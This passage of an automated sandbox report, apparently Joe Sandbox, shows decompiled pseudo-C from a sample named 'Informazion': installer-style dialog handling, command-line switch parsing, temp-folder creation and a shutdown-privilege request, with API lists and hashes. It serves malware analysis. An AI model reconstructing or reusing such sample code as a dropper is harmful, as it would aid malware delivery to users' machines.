                                                    				_v16 = _v16 & 0x00000000;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v24 = r15d;
                                                    				E00007FF67FF64C514DCC(__rcx, 0x4c51c850, __r9, _t136);
                                                    				goto 0x4c51374b;
                                                    				if (E00007FF67FF64C514A60(_t89, __rbx, __rcx, _t119, __rbp) == 0) goto 0x4c5137fd;
                                                    				if (SetDlgItemTextA(??, ??, ??) != 0) goto 0x4c5137fd;
                                                    				goto 0x4c5135c2;
                                                    				EndDialog(??, ??);
                                                    				 *0x4c51d544 = 0x800704c7;
                                                    				goto 0x4c5137fd;
                                                    				r9d = 0x104;
                                                    				if (GetDlgItemTextA(??, ??, ??, ??) == 0) goto 0x4c51375f;
                                                    				_t91 = (_t89 | 0xffffffff) + 1;
                                                    				if ( *((char*)(_t91 + 0x4c51d610)) != 0) goto 0x4c513662;
                                                    				if (_t91 - 3 < 0) goto 0x4c51375f;
                                                    				_t29 =  *0x4c51d611; // 0x3a
                                                    				if (_t29 == 0x3a) goto 0x4c513694;
                                                    				if ( *0x4c51d610 != 0x5c) goto 0x4c51375f;
                                                    				if (_t29 != 0x5c) goto 0x4c51375f;
                                                    				if (GetFileAttributesA(??) != 0xffffffff) goto 0x4c5136fa;
                                                    				_v16 = 4;
                                                    				r9d = 0;
                                                    				_v24 = 0x20;
                                                    				if (E00007FF67FF64C514DCC(_t117, 0x4c51d610, __r9, _t136) != 6) goto 0x4c5137fd;
                                                    				_t32 = CreateDirectoryA(??, ??);
                                                    				if (_t32 != 0) goto 0x4c5136fa;
                                                    				_v16 = _v16 & _t32;
                                                    				r9d = 0;
                                                    				goto 0x4c51376f;
                                                    				E00007FF67FF64C517BA8(0x104, _t91, _t93, 0x4c51d610, _t119, 0x4c51d610, 0x4c519700);
                                                    				if (E00007FF67FF64C516B70(_t46, _t91, _t93, 0x4c51d610, _t119, 0x4c51d610) != 0) goto 0x4c513721;
                                                    				goto 0x4c513764;
                                                    				if ( *0x4c51d610 != 0x5c) goto 0x4c513733;
                                                    				if ( *0x4c51d611 == 0x5c) goto 0x4c513748;
                                                    				r8d = _t46;
                                                    				if (E00007FF67FF64C516CA4(_t46, _t93, 0x4c51d610, _t117, _t119, 0x4c519700, __r9, _t136) == 0) goto 0x4c5137fd;
                                                    				EndDialog(??, ??);
                                                    				goto 0x4c5137fd;
                                                    				_v16 = _v16 & 0x00000000;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v24 = r15d;
                                                    				E00007FF67FF64C514DCC(_t117, 0x4c519700, _t135, _t136);
                                                    				goto 0x4c5137fd;
                                                    				GetDesktopWindow();
                                                    				E00007FF67FF64C514C68(E00007FF67FF64C516CA4(_t46, _t93, 0x4c51d610, _t117, _t119, 0x4c519700, __r9, _t136), _t93, _t117, _t91, 0x4c519700, _t135);
                                                    				SetWindowTextA(??, ??);
                                                    				_v24 = _v24 & 0x00000000;
                                                    				r9d = 0x103;
                                                    				r8d = _t135 - 0x3e;
                                                    				SendDlgItemMessageA(??, ??, ??, ??, ??);
                                                    				_t87 =  *0x4c51de78 - _t46; // 0x3
                                                    				if (_t87 != 0) goto 0x4c5137fd;
                                                    				GetDlgItem(??, ??);
                                                    				EnableWindow(??, ??);
                                                    				goto 0x4c513815;
                                                    				EndDialog(??, ??);
                                                    				return 1;
                                                    			}

                                                    0x7ff64c513530
                                                    0x7ff64c513530
                                                    0x7ff64c513530
                                                    0x7ff64c513530
                                                    0x7ff64c513535
                                                    0x7ff64c51353a
                                                    0x7ff64c513545
                                                    0x7ff64c51354b
                                                    0x7ff64c513551
                                                    0x7ff64c513557
                                                    0x7ff64c513561
                                                    0x7ff64c513567
                                                    0x7ff64c513569
                                                    0x7ff64c51356d
                                                    0x7ff64c513575
                                                    0x7ff64c51357e
                                                    0x7ff64c51358b
                                                    0x7ff64c51359f
                                                    0x7ff64c5135bb
                                                    0x7ff64c5135c2
                                                    0x7ff64c5135c7
                                                    0x7ff64c5135ca
                                                    0x7ff64c5135cd
                                                    0x7ff64c5135d2
                                                    0x7ff64c5135d9
                                                    0x7ff64c5135e5
                                                    0x7ff64c513608
                                                    0x7ff64c513616
                                                    0x7ff64c51361a
                                                    0x7ff64c513626
                                                    0x7ff64c513630
                                                    0x7ff64c51363c
                                                    0x7ff64c513658
                                                    0x7ff64c513662
                                                    0x7ff64c513669
                                                    0x7ff64c51366f
                                                    0x7ff64c513675
                                                    0x7ff64c51367d
                                                    0x7ff64c513686
                                                    0x7ff64c51368e
                                                    0x7ff64c5136a6
                                                    0x7ff64c5136a8
                                                    0x7ff64c5136b0
                                                    0x7ff64c5136b6
                                                    0x7ff64c5136ce
                                                    0x7ff64c5136d9
                                                    0x7ff64c5136e7
                                                    0x7ff64c5136e9
                                                    0x7ff64c5136f0
                                                    0x7ff64c5136f8
                                                    0x7ff64c513709
                                                    0x7ff64c513718
                                                    0x7ff64c51371f
                                                    0x7ff64c513728
                                                    0x7ff64c513731
                                                    0x7ff64c513733
                                                    0x7ff64c513742
                                                    0x7ff64c51374e
                                                    0x7ff64c51375a
                                                    0x7ff64c513764
                                                    0x7ff64c513769
                                                    0x7ff64c51376c
                                                    0x7ff64c513772
                                                    0x7ff64c513777
                                                    0x7ff64c51377c
                                                    0x7ff64c51377e
                                                    0x7ff64c513790
                                                    0x7ff64c51379f
                                                    0x7ff64c5137ab
                                                    0x7ff64c5137b1
                                                    0x7ff64c5137bf
                                                    0x7ff64c5137c3
                                                    0x7ff64c5137cf
                                                    0x7ff64c5137d6
                                                    0x7ff64c5137e0
                                                    0x7ff64c5137f1
                                                    0x7ff64c513800
                                                    0x7ff64c513804
                                                    0x7ff64c51382a

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                    • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Maintal
                                                    • API String ID: 3530494346-2610190985
                                                    • Opcode ID: a08a017480455ad58ed40beb3e76922a0008dbd9e9d8db7458c61f95b230d354
                                                    • Instruction ID: 6a520a05aa0220bed337196c01bbbce8d709ef133ada8187171f957825c28b74
                                                    • Opcode Fuzzy Hash: a08a017480455ad58ed40beb3e76922a0008dbd9e9d8db7458c61f95b230d354
                                                    • Instruction Fuzzy Hash: B4719561E0C6428AF768BF29A41C37D6E91FF85B94F548132CABE82795CF3CE5258700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                    • String ID:
                                                    • API String ID: 2168512254-0
                                                    • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                    • Instruction ID: 7e51fdeea804583b1d98d92475d66fb0dbbe30404c0c987ae06a40ce89841c3e
                                                    • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                    • Instruction Fuzzy Hash: B1517136A08A41CAE724BF25E4482BD7FA4FB4DB98F415176DA1E93758CF38E464C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 2829607268-3733053543
                                                    • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                    • Instruction ID: 4ddff4fb06040b76ac9161da9763e691d47dfe00b7532065336a7a26b2f972b2
                                                    • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                    • Instruction Fuzzy Hash: 92216B76E2CA4286E754BF28E05977EBF60FB89749F409136DA5E82B58DF3CD0548B00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 4104442557-0
                                                    • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                    • Instruction ID: 9bd60db778dbee5f41e7ef45c0f27b8e30a263a9898604a5b06b819739ba9d65
                                                    • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                    • Instruction Fuzzy Hash: 33112122A08B418AEB14FF65E8482AC37A4FB09758F400A35EA6D87754EF7CE574C340
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 54%
                                                    			E00007FF67FF64C5170A8(void* __ebx, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rsi, void* __r11) {
                                                    				void* __rbp;
                                                    				void* _t68;
                                                    				char _t70;
                                                    				CHAR* _t75;
                                                    				intOrPtr _t76;
                                                    				CHAR* _t77;
                                                    				intOrPtr _t80;
                                                    				CHAR* _t81;
                                                    				intOrPtr _t82;
                                                    				CHAR* _t83;
                                                    				CHAR* _t89;
                                                    				char _t93;
                                                    				char _t96;
                                                    				intOrPtr _t98;
                                                    				intOrPtr _t100;
                                                    				char _t112;
                                                    				void* _t118;
                                                    				signed int _t130;
                                                    				signed int _t141;
                                                    				void* _t170;
                                                    				void* _t171;
                                                    				signed int _t174;
                                                    				char _t206;
                                                    				char _t208;
                                                    				char _t225;
                                                    				signed long long _t229;
                                                    				signed long long _t230;
                                                    				long _t232;
                                                    				signed long long _t236;
                                                    				void* _t238;
                                                    				char* _t240;
                                                    				signed long long _t244;
                                                    				void* _t246;
                                                    				signed long long _t247;
                                                    				void* _t249;
                                                    				CHAR* _t266;
                                                    				CHAR* _t267;
                                                    				CHAR* _t268;
                                                    				void* _t279;
                                                    				intOrPtr _t289;
                                                    				CHAR* _t305;
                                                    				void* _t308;
                                                    				signed long long _t309;
                                                    				CHAR* _t312;
                                                    				void* _t322;
                                                    				long _t325;
                                                    				CHAR* _t327;
                                                    				struct HINSTANCE__* _t329;
                                                    				signed long long _t331;
                                                    				intOrPtr* _t332;
                                                    				CHAR* _t334;
                                                    
                                                    				_t303 = __rsi;
                                                    				_t118 = __ebx;
                                                    				 *((long long*)(_t308 + 0x10)) = __rbx;
                                                    				 *((long long*)(_t308 + 0x18)) = __rsi;
                                                    				 *((long long*)(_t308 + 0x20)) = __rdi;
                                                    				_t306 = _t308 - 0x60;
                                                    				_t309 = _t308 - 0x160;
                                                    				_t229 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_t230 = _t229 ^ _t309;
                                                    				 *(_t308 - 0x60 + 0x50) = _t230;
                                                    				r15d = 0;
                                                    				r12d = 1;
                                                    				if (__rcx == 0) goto 0x4c5176c0;
                                                    				if ( *__rcx == r15b) goto 0x4c5176c0;
                                                    				_t141 = _t325 + 1;
                                                    				r13d = 0x104;
                                                    				if (r12d == 0) goto 0x4c5171cd;
                                                    				if ( *((char*)(__rcx)) == 0x20) goto 0x4c51711d;
                                                    				if ( *__rcx - 9 - 4 > 0) goto 0x4c517131;
                                                    				CharNextA(_t334);
                                                    				_t331 = _t230;
                                                    				goto 0x4c51710e;
                                                    				if ( *_t331 == r15b) goto 0x4c5171cd;
                                                    				_t266 = _t334;
                                                    				r8d = r15d;
                                                    				r9d = r15d;
                                                    				_t130 = r12d;
                                                    				if (r8d != 0) goto 0x4c51715a;
                                                    				_t68 =  *_t331;
                                                    				if (_t68 == 0x20) goto 0x4c5171b2;
                                                    				if (_t68 - 9 - 4 <= 0) goto 0x4c5171b2;
                                                    				goto 0x4c51715f;
                                                    				if (r9d != 0) goto 0x4c5171b2;
                                                    				_t70 =  *_t331;
                                                    				if (_t70 != 0x22) goto 0x4c517194;
                                                    				if ( *((intOrPtr*)(_t331 + 1)) == _t70) goto 0x4c51717b;
                                                    				if (r8d != 0) goto 0x4c517176;
                                                    				r8d = r12d;
                                                    				goto 0x4c5171a7;
                                                    				r9d = r12d;
                                                    				goto 0x4c5171a7;
                                                    				if (_t130 - r13d >= 0) goto 0x4c517566;
                                                    				( &(_t266[0x40]))[_t309] = 0x22;
                                                    				_t267 =  &(_t266[_t325]);
                                                    				goto 0x4c5171aa;
                                                    				if (_t130 + r12d - r13d >= 0) goto 0x4c517566;
                                                    				( &(_t267[0x40]))[_t309] = _t70;
                                                    				_t268 =  &(_t267[_t325]);
                                                    				_t232 = _t325;
                                                    				_t332 = _t331 + _t232;
                                                    				if ( *_t332 != r15b) goto 0x4c517146;
                                                    				if (_t268 - _t327 >= 0) goto 0x4c5176f1;
                                                    				( &(_t268[0x40]))[_t309] = r15b;
                                                    				if (r8d == 0) goto 0x4c517225;
                                                    				if (r9d != 0) goto 0x4c51722a;
                                                    				_t170 =  *0x4c51cd0c - r15d; // 0x0
                                                    				if (_t170 == 0) goto 0x4c5176bc;
                                                    				_t171 =  *0x4c51ce1e - r15b; // 0x0
                                                    				if (_t171 != 0) goto 0x4c5176bc;
                                                    				r8d = r13d;
                                                    				if (GetModuleFileNameA(_t329, _t327, _t325) == 0) goto 0x4c5176b9;
                                                    				E00007FF67FF64C517D68(0x5c, _t232, 0x4c51ce1e, 0x4c51ce1e, __rsi, _t308 - 0x60);
                                                    				 *(_t232 + 1) = r15b;
                                                    				goto 0x4c5176bc;
                                                    				if (r9d != 0) goto 0x4c5171ca;
                                                    				_t174 =  *((intOrPtr*)(_t309 + 0x40)) - 0x0000002d & 0x000000fd;
                                                    				if (_t174 != 0) goto 0x4c517566;
                                                    				_t75 = CharUpperA(_t305);
                                                    				if (_t174 == 0) goto 0x4c51766f;
                                                    				if (_t174 == 0) goto 0x4c51756d;
                                                    				if (_t174 == 0) goto 0x4c517443;
                                                    				if (_t174 == 0) goto 0x4c5173cd;
                                                    				if (_t174 == 0) goto 0x4c517381;
                                                    				if (_t174 == 0) goto 0x4c517298;
                                                    				if (_t75 - 0x3b - r12d - 7 - r12d == _t141) goto 0x4c517443;
                                                    				if ( *_t332 == r15b) goto 0x4c5171cd;
                                                    				goto 0x4c517106;
                                                    				_t76 =  *((intOrPtr*)(_t309 + 0x42));
                                                    				if (_t76 != 0) goto 0x4c5172b3;
                                                    				 *0x4c51de5c = 3;
                                                    				 *0x4c51cd08 = r12d;
                                                    				goto 0x4c51728a;
                                                    				if (_t76 != 0x3a) goto 0x4c517346;
                                                    				 *0x4c51de5c = r12d;
                                                    				if (_t76 == 0) goto 0x4c51728a;
                                                    				_t21 = _t309 + 0x43; // 0x44
                                                    				_t77 = CharUpperA(??);
                                                    				if (_t77 == 0x41) goto 0x4c51732e;
                                                    				if (_t77 == 0x44) goto 0x4c517325;
                                                    				if (_t77 == 0x49) goto 0x4c51731c;
                                                    				if (_t77 == 0x4e) goto 0x4c517313;
                                                    				if (_t77 == 0x50) goto 0x4c517309;
                                                    				if (_t77 == 0x53) goto 0x4c517300;
                                                    				goto 0x4c51733b;
                                                    				 *0x4c51de5c =  *0x4c51de5c | 0x00000004;
                                                    				goto 0x4c517334;
                                                    				asm("bts dword [0x5d17], 0x7");
                                                    				goto 0x4c51733b;
                                                    				 *0x4c51de5c =  *0x4c51de5c & 0xfffffffe;
                                                    				goto 0x4c517334;
                                                    				 *0x4c51de5c =  *0x4c51de5c & 0xfffffffd;
                                                    				goto 0x4c517334;
                                                    				 *0x4c51d028 =  *0x4c51d028 | 0x00000040;
                                                    				goto 0x4c51733b;
                                                    				 *0x4c51de5c =  *0x4c51de5c | _t141;
                                                    				 *0x4c51cd08 = r12d;
                                                    				if ( *((intOrPtr*)(_t21 + _t325)) != 0) goto 0x4c5172d0;
                                                    				goto 0x4c51728a;
                                                    				 *(_t309 + 0x28) =  *(_t309 + 0x28) | 0xffffffff;
                                                    				_t24 = _t309 + 0x41; // 0x42
                                                    				r9d = r9d | 0xffffffff;
                                                    				 *((long long*)(_t309 + 0x20)) = _t24;
                                                    				if (CompareStringA(??, ??, ??, ??, ??, ??) == _t141) goto 0x4c51728a;
                                                    				goto 0x4c517287;
                                                    				_t80 =  *((intOrPtr*)(_t309 + 0x42));
                                                    				if (_t80 != 0) goto 0x4c517395;
                                                    				 *0x4c51cd18 = _t141;
                                                    				goto 0x4c51728a;
                                                    				if (_t80 != 0x3a) goto 0x4c517287;
                                                    				_t81 = CharUpperA(??);
                                                    				if (_t81 == 0x31) goto 0x4c517389;
                                                    				if (_t81 == 0x41) goto 0x4c5173c0;
                                                    				if (_t81 == 0x55) goto 0x4c517389;
                                                    				goto 0x4c517287;
                                                    				 *0x4c51cd18 = r12w;
                                                    				goto 0x4c51728a;
                                                    				_t82 =  *((intOrPtr*)(_t309 + 0x42));
                                                    				if (_t82 != 0) goto 0x4c5173e1;
                                                    				 *0x4c51cd0c = r12d;
                                                    				goto 0x4c51728a;
                                                    				if (_t82 != 0x3a) goto 0x4c517287;
                                                    				if (_t82 == 0) goto 0x4c51728a;
                                                    				_t30 = _t309 + 0x43; // 0x44
                                                    				_t83 = CharUpperA(??);
                                                    				if (_t83 == 0x45) goto 0x4c517431;
                                                    				if (_t83 == 0x47) goto 0x4c517428;
                                                    				if (_t83 == 0x56) goto 0x4c51741f;
                                                    				goto 0x4c517438;
                                                    				 *0x4c51cd14 = r12d;
                                                    				goto 0x4c517438;
                                                    				 *0x4c51cd10 = r12d;
                                                    				goto 0x4c517438;
                                                    				 *0x4c51cd0c = r12d;
                                                    				if ( *((intOrPtr*)(_t30 + _t325)) != 0) goto 0x4c5173fb;
                                                    				goto 0x4c51728a;
                                                    				if ( *((char*)(_t309 + 0x42)) != 0x3a) goto 0x4c517287;
                                                    				_t236 =  *((intOrPtr*)(_t309 + 0x43));
                                                    				_t33 = _t309 + 0x40; // 0x41
                                                    				asm("sbb ebx, ebx");
                                                    				_t238 = (_t236 | 0xffffffff) + 1;
                                                    				if ( *((intOrPtr*)(_t33 + _t236 + _t238)) != r15b) goto 0x4c51746a;
                                                    				if (_t238 == 0) goto 0x4c517287;
                                                    				_t35 = _t309 + 0x30; // 0x31
                                                    				 *((intOrPtr*)(_t309 + 0x30)) = _t118 + 4;
                                                    				if (E00007FF67FF64C517024(_t33 + _t236, _t35) == 0) goto 0x4c517287;
                                                    				_t89 = CharUpperA(??);
                                                    				_t312 = _t327;
                                                    				_t38 = _t309 + 0x40; // 0x41
                                                    				if (_t89 != 0x54) goto 0x4c5174e7;
                                                    				_t279 = _t38 + _t238 - 0x4c51ce1e;
                                                    				_t240 =  &(_t312[0x7ffffefa]);
                                                    				if (_t240 == 0) goto 0x4c517518;
                                                    				_t93 =  *((intOrPtr*)(_t279 + 0x4c51ce1e));
                                                    				_t206 = _t93;
                                                    				if (_t206 == 0) goto 0x4c517518;
                                                    				 *0x4c51ce1e = _t93;
                                                    				if (_t206 != 0) goto 0x4c5174c8;
                                                    				goto 0x4c517518;
                                                    				if (_t312 - _t325 + 0x7ffffefa == 0) goto 0x4c517518;
                                                    				_t96 =  *((intOrPtr*)(_t279 + _t240 - 0x4c51cd1a + 0x4c51cd1a));
                                                    				_t208 = _t96;
                                                    				if (_t208 == 0) goto 0x4c517518;
                                                    				 *0x4c51cd1a = _t96;
                                                    				_t297 = 0x4c51cd1a + _t325;
                                                    				if (_t208 != 0) goto 0x4c5174fb;
                                                    				_t44 = _t297 - 1; // -1
                                                    				_t244 =  !=  ? 0x4c51cd1a + _t325 : _t44;
                                                    				 *_t244 = r15b;
                                                    				E00007FF67FF64C517BA8(r13d, _t244, 0x4c51cd1a, 0x4c51cd1a, _t303, _t308 - 0x60, 0x4c519700);
                                                    				_t246 = (_t244 | 0xffffffff) + 1;
                                                    				if ( *((intOrPtr*)(0x4c51cd1a + _t246)) != r15b) goto 0x4c51753f;
                                                    				if (_t246 - 3 < 0) goto 0x4c517566;
                                                    				_t98 =  *0x7FF64C51CD1B;
                                                    				if (_t98 == 0x3a) goto 0x4c51728a;
                                                    				if ( *0x4c51cd1a != 0x5c) goto 0x4c517566;
                                                    				if (_t98 == 0x5c) goto 0x4c51728a;
                                                    				goto 0x4c5176c3;
                                                    				_t100 =  *((intOrPtr*)(_t309 + 0x42));
                                                    				if (_t100 != 0) goto 0x4c517581;
                                                    				 *0x4c51cd04 = r12d;
                                                    				goto 0x4c51728a;
                                                    				if (_t100 != 0x3a) goto 0x4c517287;
                                                    				_t247 =  *((intOrPtr*)(_t309 + 0x43));
                                                    				_t49 = _t309 + 0x40; // 0x41
                                                    				asm("sbb edi, edi");
                                                    				_t262 = _t49 + _t247;
                                                    				_t249 = (_t247 | 0xffffffff) + 1;
                                                    				if ( *((intOrPtr*)(_t49 + _t247 + _t249)) != r15b) goto 0x4c5175a5;
                                                    				if (_t249 != 0) goto 0x4c5175bd;
                                                    				goto 0x4c517287;
                                                    				E00007FF67FF64C517CE8(0x5b, _t249, _t49 + _t247, _t49 + _t247, _t303);
                                                    				if (_t249 == 0) goto 0x4c5175e1;
                                                    				E00007FF67FF64C517CE8(0x5d, _t249, _t49 + _t247, _t262, _t303);
                                                    				if (_t249 == 0) goto 0x4c5175b3;
                                                    				E00007FF67FF64C517CE8(0x5d, _t249, _t262, _t262, _t303);
                                                    				if (_t249 == 0) goto 0x4c517605;
                                                    				E00007FF67FF64C517CE8(0x5b, _t249, _t262, _t262, _t303);
                                                    				if (_t249 == 0) goto 0x4c5175b3;
                                                    				_t51 = _t309 + 0x30; // 0x31
                                                    				 *((intOrPtr*)(_t309 + 0x30)) = 2;
                                                    				if (E00007FF67FF64C517024(_t262, _t51) == 0) goto 0x4c5175b3;
                                                    				_t54 = _t309 + 0x40; // 0x41
                                                    				if ( &(_t327[0x7ffffefa]) == 0) goto 0x4c517657;
                                                    				_t112 =  *((intOrPtr*)(_t54 + _t249 - 0x4c51cf22 + 0x4c51cf22));
                                                    				_t225 = _t112;
                                                    				if (_t225 == 0) goto 0x4c517657;
                                                    				 *0x4c51cf22 = _t112;
                                                    				_t300 = 0x4c51cf22 + _t325;
                                                    				if (_t225 != 0) goto 0x4c51763a;
                                                    				_t57 = _t300 - 1; // -1
                                                    				_t253 =  !=  ? 0x4c51cf22 + _t325 : _t57;
                                                    				 *( !=  ? 0x4c51cf22 + _t325 : _t57) = r15b;
                                                    				goto 0x4c51728a;
                                                    				 *(_t309 + 0x28) = r15d;
                                                    				r9d = 0;
                                                    				 *((intOrPtr*)(_t309 + 0x20)) = 0x40;
                                                    				E00007FF67FF64C514DCC(_t54 + _t249 - 0x4c51cf22, 0x4c519700, 0x4c51cf22, _t322);
                                                    				_t289 =  *0x4c51c830; // 0x0
                                                    				if (_t289 == 0) goto 0x4c5176aa;
                                                    				CloseHandle(??);
                                                    				ExitProcess(??);
                                                    				asm("int3");
                                                    				goto 0x4c5176c3;
                                                    				return E00007FF67FF64C518470(r12d, 0,  *(_t306 + 0x50) ^ _t309);
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                    • String ID: "$:$@$RegServer
                                                    • API String ID: 1203814774-4077547207
                                                    • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                    • Instruction ID: 13bdec925afad7438aa2ad35717105df72fd39d630fb6bd0f103f20171893072
                                                    • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                    • Instruction Fuzzy Hash: C802CE21E0C68285EA6CBF2C940C67D6FA1AF427D0F580537D97E86795CE3DE962C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 19%
                                                    			E00007FF67FF64C513910(void* __edx, void* __esi, void* __eflags, void* __rax, long long __rbx, long long __rcx, long long __rsi, void* __r8, long long _a8, long long _a16) {
                                                    				signed int _v16;
                                                    				signed int _v24;
                                                    				void* _t16;
                                                    				signed int _t27;
                                                    				void* _t57;
                                                    				long long _t66;
                                                    				long long _t69;
                                                    				long long _t81;
                                                    				void* _t83;
                                                    				void* _t92;
                                                    				void* _t94;
                                                    
                                                    				_t57 = __rax;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_t83 = __r8;
                                                    				_t81 = __rcx;
                                                    				if (__eflags == 0) goto 0x4c513b12;
                                                    				if (__eflags == 0) goto 0x4c513b0c;
                                                    				if (__eflags == 0) goto 0x4c513a11;
                                                    				if (__eflags == 0) goto 0x4c51397b;
                                                    				if (__edx - 0xffffffffffffff0f == 0xe90) goto 0x4c51395b;
                                                    				goto 0x4c513b29;
                                                    				TerminateThread(??, ??);
                                                    				goto 0x4c513b1a;
                                                    				if (__r8 != 2) goto 0x4c513b26;
                                                    				ResetEvent(??);
                                                    				_t66 =  *0x4c51c828; // 0x0
                                                    				r9d = 0;
                                                    				_v16 = 4;
                                                    				_v24 = 0x20;
                                                    				_t16 = E00007FF67FF64C514DCC(_t66, 0x4c519700, _t92, _t94);
                                                    				if (_t16 == 6) goto 0x4c5139e4;
                                                    				if (_t16 == 1) goto 0x4c5139e4;
                                                    				SetEvent(??);
                                                    				goto 0x4c513b26;
                                                    				 *0x4c51d5fc = 1;
                                                    				SetEvent(??);
                                                    				_t69 =  *0x4c51ca58; // 0x0
                                                    				E00007FF67FF64C513B40(_t69, 0x4c519700);
                                                    				goto 0x4c513b18;
                                                    				 *0x4c51c828 = _t81;
                                                    				GetDesktopWindow();
                                                    				E00007FF67FF64C514C68(_t16 - 1, __rbx, _t81, _t57, 0x4c519700, _t92);
                                                    				if ( *0x4c51c1ac == 0) goto 0x4c513a9b;
                                                    				GetDlgItem(??, ??);
                                                    				r9d = 0xbb9;
                                                    				r8d = r8d ^ r8d;
                                                    				SendMessageA(??, ??, ??, ??);
                                                    				GetDlgItem(??, ??);
                                                    				SendMessageA(??, ??, ??, ??);
